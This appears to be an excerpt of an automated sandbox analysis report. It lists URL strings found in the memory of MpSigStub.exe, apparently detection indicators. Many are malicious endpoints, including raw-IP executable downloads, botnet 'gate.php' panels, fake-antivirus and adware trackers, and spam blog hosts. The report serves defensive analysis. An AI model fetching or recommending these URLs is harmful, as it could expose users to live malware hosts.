Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://85.255.119
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://91.196.216.30/counter.php
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.153/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/
Source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/_
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://95.64.47.164/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp String found in binary or memory: http://Andrei512.narod.ru
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://YOURSITE.com/bot.exea
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://a-search.biz/&
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://a.pomf.cat/zjiqnx.html
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://a.pomfe.co/hnwila.xml
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://a.up-00.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://a0571310.xsph.ru/djfklvk/revert.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.co
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.coS&
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://a1us6j2z.recordgate.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
Source: MpSigStub.exe, 0000000B.00000003.18312990479.0000021B5F514000.00000004.00000001.sdmp String found in binary or memory: http://aaacollectionsjewelry.com/x9djsa
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aancyber77.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://adwpro.avelite.hop.clickbank.net/?mode=p
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.org
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.orgxw
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alerts.local/alert1.html
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alfaportal.com/c
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alfredo.myphotos.cc/scripts/view.asp
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://alhalm-now.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://alindaenua.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://aliyun.one
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://all-best-facts.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://allabouttopten.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://allcomics4free.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://allsexyinbox.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://allwallpaper3d.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://almasto.net/
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://altavista.com/favicon.ico
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://amazing-cars.org
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://ameganfoxhairstyle.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://amigobin.cdnmail.ru/AmigoDistrib.exe
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://aminxfreedownload.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://ammun-ra.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://anazhthseis.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp String found in binary or memory: http://ancalog.tech/
Source: MpSigStub.exe, 0000000B.00000003.18266135814.0000021B5EBFB000.00000004.00000001.sdmp String found in binary or memory: http://ancalog.win/
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://andrew08.testar.testforhost.com/ksinamisev.exe/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://andromulator.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://andsihowdint.ru/april/get.php?id=
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://anhchebongda.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://anherbal.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://animefrase.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://anomaniez.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://anonfile.xyz
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://antispysolutions.com/?aid=
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://antivirus-x.com/in.cgi?20
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://anty.freehostia.com/xxx/d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://anty.freehostia.com/xxx/d5SOFTWARE
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aolopdephn.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://ap.4iitk0-ninv.xyz/?e=u2fuzgkuvghvbxbzb25ay290lnrulmdvdg==
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://ap.gamezi.com/
Source: MpSigStub.exe, 0000000B.00000003.18265195044.0000021B4BCEC000.00000004.00000001.sdmp String found in binary or memory: http://api.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://api.downloadmr.com/installer/
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://api.downloadmr.com/installer/xM
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://api.getwebcake.com/getwebcake/gc1
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://api.media-tractor.com/track/?data=301
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://apivones.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://apk.downloadatoz.com/package/com.allinone.free.apk
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://apkfull2016.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://apofraxisavlonitis.gr/usswz/
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: http://app.fileman.co.kr/app/Fileman.exe
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: http://app.fileman.co.kr/app/ver.ini
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://app.whenu.com/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://app.whenu.com/Offers
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://apps.bittorrent.com/cl_search/x6
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://apps.tangotoolbar.com
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://appstub.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://appustories.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://apupdates-westeurope.cloudapp.net/Update/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://araazman.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://arab-garden.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://aradiklarinburada.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://arianarosefull.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://arifkacip.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://arizonaic.com
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://arpp0934.iespana.es
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://arthisoft.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://articlunik.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://artishollywoodbikini.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://asiafoodlog.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://asianhotxxx.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://asilsizhaber.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://aspeja.org/question/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://assistant.3721.com/instok
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://asuguglejancok.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://athasoftonlinestore.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ati.vn
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://auglaizeseniorservices.com/lombrdia/lomardia.php
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://australia-505.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://auto.ie.searchforge.com/
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://auto.ie.searchforge.com/g
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://auto.livesearchpro.com/response
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://auto.search.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://autonamlong.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://autothich.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://avcute.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://averyfunnypage.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://avnisevinc.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://avocat360.fr/7-past-due-invoices/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://ayanojou.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18321241756.0000021B5E398000.00000004.00000001.sdmp String found in binary or memory: http://b.reich.io/
Source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp String found in binary or memory: http://b.wehelptoyou.com
Source: MpSigStub.exe, 0000000B.00000003.18305104252.0000021B5E24E000.00000004.00000001.sdmp String found in binary or memory: http://ba3a.biz
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://babelfish.altavista.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://bachduongshops.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://bai2.tlbxsj.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://balaiomaranhao.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://banatara.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://banatte.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://bangash-free-soft.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://bani-pe-net-cum-sa-faci-bani.blogspot.com/
